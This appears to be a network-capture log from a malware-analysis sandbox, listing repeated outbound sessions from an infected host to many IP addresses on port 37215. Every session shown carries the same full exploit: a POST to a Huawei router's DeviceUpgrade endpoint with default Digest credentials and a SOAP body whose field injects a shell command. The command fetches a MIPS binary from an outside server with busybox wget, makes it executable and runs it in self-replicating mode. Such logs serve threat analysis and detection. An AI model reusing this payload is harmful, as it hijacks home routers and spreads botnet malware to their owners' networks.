                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27192.168.2.2337592197.8.4.937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277322054 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28192.168.2.2345216194.47.255.14137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277323008 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29192.168.2.233887841.112.247.25137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277324915 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30192.168.2.235004241.195.101.15237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277333975 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31192.168.2.233774841.94.130.19637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277334929 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32192.168.2.23383324.213.80.1237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277344942 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33192.168.2.2338008157.206.23.9637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277345896 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34192.168.2.2336372197.137.96.6937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277358055 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35192.168.2.233419841.17.212.16337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277368069 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192.168.2.2338180157.12.47.2037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.277368069 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
